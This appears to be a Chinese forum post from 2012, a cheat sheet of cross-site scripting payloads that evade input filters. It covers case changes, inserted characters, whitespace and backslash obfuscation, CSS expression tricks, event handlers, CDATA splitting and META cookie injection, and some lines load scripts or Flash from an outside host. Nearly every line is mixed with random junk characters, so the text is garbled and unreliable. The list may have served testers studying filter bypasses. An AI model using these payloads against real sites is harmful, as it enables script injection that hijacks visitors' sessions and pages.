1. 改变字符大小写( t: ~( ^8 B" u$ k: c
! f( g1 q8 P& C r
- p3 }1 V0 [6 r! F* M( U- A% `
3 T$ Z8 [0 n+ i' I/ U: R <sCript>alert(‘d’)</scRipT>
# d; l5 b4 ]! p( T3 }9 O3 M) I% k# m0 h3 l% U
2. 利用多加一些其它字符来规避Regular Expression的检查
3 k( Q: u. `5 P0 K7 D) y& Q6 \" S) g% s% B+ B7 ]
<<script>alert(‘c’)//<</script>: [+ K; u+ ~2 e- }
$ T) h2 I: t5 R" \: \ <SCRIPT a=">" SRC="t.js"></SCRIPT>' \0 b5 y" [. { x
9 A6 z+ w7 m9 W3 J* L" [9 K
<SCRIPT =">" SRC="t.js"></SCRIPT>
' \ g9 o: H2 P& o Y) ?7 a7 d
; `9 j7 H' x- ]/ Q4 n P <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
% ?: T2 x4 V* ^9 }7 {3 z1 P
% z1 u- S9 n/ d4 T8 h, }. Z* a g <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
5 h$ u4 e. L7 z- [ D
& @1 g/ I. q; M# O" I; u <SCRIPT a=`>` SRC="t.js"></SCRIPT>
, J. e: Y& C% e; p8 w( J: o- c/ F4 n2 p' ^. b
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>! w% p% ?1 e6 q
, U& D8 a0 i1 ~, a' q/ e' f
3. 以其它扩展名取代.js% R3 S& p: L! E4 B/ r
! T, R5 B, e5 s O, i6 A: D <script src="bad.jpg"></script>
4 Z( a! @5 _" k9 u5 V! z8 y9 V) b" ~ n* D: J j5 d
4. 将Javascript写在CSS档里
8 A e3 h+ \& P# W# Y! {% C5 }: b/ D- N5 c9 C
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
, H5 m- t+ R6 w! {7 d7 N& g+ d+ r& _1 R. m1 S7 W# d
example:
! |3 m( U( S4 n7 ^ t5 ~8 W. d" s0 F; L
body {# H0 c- ~1 I4 u* |/ F: z8 X! I
& Y5 n8 h( D1 q' G background-image: url(‘javascript:alert("XSS");’)2 U' t( f* k, x" ~ B' _" `
5 k& Q6 V4 R* `' O8 `( [. C. U
}
; |: ?0 Q+ U6 s. C, T9 z' {- j; O+ f5 Y/ Q
5. 在script的tag里加入一些其它字符) q' n" t) [7 ]& ]
8 g) v i _- W/ T& r, s3 q
<SCRIPT/SRC="t.js"></SCRIPT>! T. T, b/ j0 o2 D) J
8 o4 f- s* | k) _% x" Q <SCRIPT/anyword SRC="t.js"></SCRIPT>
6 ~4 T% B P7 h, t
0 X# ]9 T( B; e4 m8 B6. 使用tab或是new line来规避0 z% M3 W$ _. y6 w: Z' R4 g" O
4 {- P+ ^8 c" v6 n. B0 r' j. s <img src="jav ascr ipt:alert(‘XSS3′)">
/ u ~5 W8 \: L) Z5 C
3 C+ ]- _& l$ f8 ~$ R+ R _ <img src="jav ascr ipt:alert(‘XSS3′)">
u/ n% r5 n* \" m6 w7 N
, I. r# @6 {4 Y/ P <IMG SRC="jav ascript:alert(‘XSS’);">
7 U/ |* c- z* X, t" x$ M) q6 A" k1 w
1 K) e4 {9 `- u* _+ k5 d C. p -> tag
! C6 n4 [4 a( J$ w$ M( a9 B/ O" ?6 F$ j5 F( t. y
-> new line
$ J5 I d, t$ b2 Y* Y/ ]$ x7 M% z# X9 W# l7 _" f# r* @+ @
7. 使用"\"来规避
% m K. Q4 E; W7 u g5 V6 L/ k% h8 b7 O6 p4 w, F
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>9 T2 m- `& T. I' j+ F& l! Z
+ S8 P2 ~ R4 \6 f9 i6 g/ B- W <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>/ i9 _6 }' x# y# a8 d9 P
& r& N' C' g) }" h" K <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">( d3 v9 j9 s; E9 l8 G5 o1 m
! f3 m$ J% V: y) g9 ]2 o/ {
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
) Z( J+ }; f+ c+ }7 [. S0 M) y- V1 I- k+ J- G! |# ]
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>( v+ S- y% |' O% ?( z2 O" Q* E
; d1 w" I9 Q4 b& t
8. 使用Hex encode来规避(也可能会把";"拿掉)
! r! K/ G1 K5 H4 ~( z% `9 Z) C
7 h- Z) d" q; ^* y <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
3 i; V v& [, Y- B( A- }/ n: O# K% L C$ a" |% i3 d" S$ [
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- A L. k! Y8 l3 B" Z
f- B* B- y z9 Y9 O <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">/ o! [) I& {" |; M) U
" B0 m* i6 E$ R: i
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
: E3 ]4 j8 [' m3 F" W4 a
! C# M' E! q0 a D9. script in HTML tag8 e0 n2 N9 E2 \# o
- T* m5 l, l9 ]' R* x1 G- k
<body onload=」alert(‘onload’)」>
. K3 `' [2 D1 s' ?( W+ u5 h ?: s% o+ Z* w: C
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
7 g. o1 d" Y' K! v$ C+ P5 T7 M# n& G( f1 W" h6 @& g
10. 在swf里含有xss的code
6 @* \( @" n3 R2 J
* O; U6 E# }0 ?1 o <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
0 u" v$ |7 S$ }3 r1 g
. q8 L0 q o2 k, W6 w+ p4 @5 d% {" x11. 利用CDATA将xss的code拆开,再组合起来。4 D2 K! d5 X' B/ ^
1 ^, [% d8 [# _3 J4 Y <XML ID=I><X><C>
4 j3 Y, E* v |0 r7 f
( w, m h9 z( a' s: c! F <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
) J0 ^ m @1 ^3 W: [4 E2 Y
/ u* {+ W0 @& a: }+ R" U, \$ v7 v </C></X>$ I$ O6 g5 ]& [) Q. a
. l; s, u8 M, m* [( N* e& Z6 I
</xml>
, N& U6 ~$ z2 d. @( w! X5 Z+ }8 g8 Y1 v8 s1 ?% J
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
% t( a( y! G' d y/ q- a* u5 E `) H% p4 P& Z! y5 T
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
) u) A$ j& O& D [% \7 V8 Z6 A3 \
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
& o- S) H% ~5 E8 y% c: Y) W0 Q7 l5 G7 |. o7 d4 \: m$ N3 v0 r" T2 p, ~
12. 利用HTML+TIME。
% q9 D$ c1 E8 }, p( L0 D
7 ^# Y3 K, V2 n% [# i2 ? <HTML><BODY>
! x% v1 t: @ U" f! ]6 v! k4 Q! {5 T+ y: [6 C5 o& e
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">7 Z' s' P9 K% t) V
1 a! q& ~" Y8 n; j <?import namespace="t" implementation="#default#time2">
: l$ Z9 U# `4 }+ s+ D& ?* m* A: _. e8 O; c4 r4 }- H. M
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
) B4 s$ ?$ A% o" G% ?: d; {. g! z& j% ^
</BODY></HTML>
% X) o8 p* B; o, U$ V
0 F- g. q) d1 t4 z" K6 k13. 透过META写入Cookie。
) S) h3 L/ w7 t6 H) j# p" E. R# ?- O! _) O$ }
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
( C5 j( a P. b& ?8 b' a z3 g- q; b" e# m+ K
14. javascript in src , href , url
4 z. l' }6 f% [
7 u) k: W2 `# |" Q; G* v <IFRAME SRC=javascript:alert(’13′)></IFRAME>
: s) W- v9 @4 X g: |" J+ n" ? z# r; ^! k' A
<img src="javascript:alert(‘XSS3′)">" [; I5 [+ F& D9 c
! b. j) x, b1 V& C<IMG DYNSRC="javascript:alert(‘XSS20′)">$ i$ \/ U' _# r& b ^! Q
, C& g7 _* n7 i3 {' I( m2 W7 m
<IMG LOWSRC="javascript:alert(‘XSS21′)">2 A/ K) G5 p4 K( S( |. X
0 f. M+ t. }9 p$ W <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">7 d8 k+ E7 f4 s v1 k6 e1 _8 a2 U
' C6 n8 G- ?$ E# J <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
1 m* g; O+ A3 F9 d; J/ l# L' ?! B' X+ q% C& D. n1 p. I# H* e0 t
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">) B; \$ ^+ D! c2 [) L J
5 u K% y; u, O+ ~/ y% `) Z7 j
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
- D" Q! K' }9 q3 M8 o
( N( x) N2 @, K( t7 r+ D <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
% W# j& `% Z1 \3 `' o1 Q5 n
1 A9 q- g% a9 C$ D </STYLE><A CLASS=XSS></A>
1 r% Q" _% f, w! r
; o% ^/ V& J5 N4 S+ g <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
9 k. G4 R" x0 n3 U* t2 K8 z' f, D$ ~0 Q* ?5 Q, y! A5 _
|
发表于 2012-12-31 09:59:28
收藏
支持
反对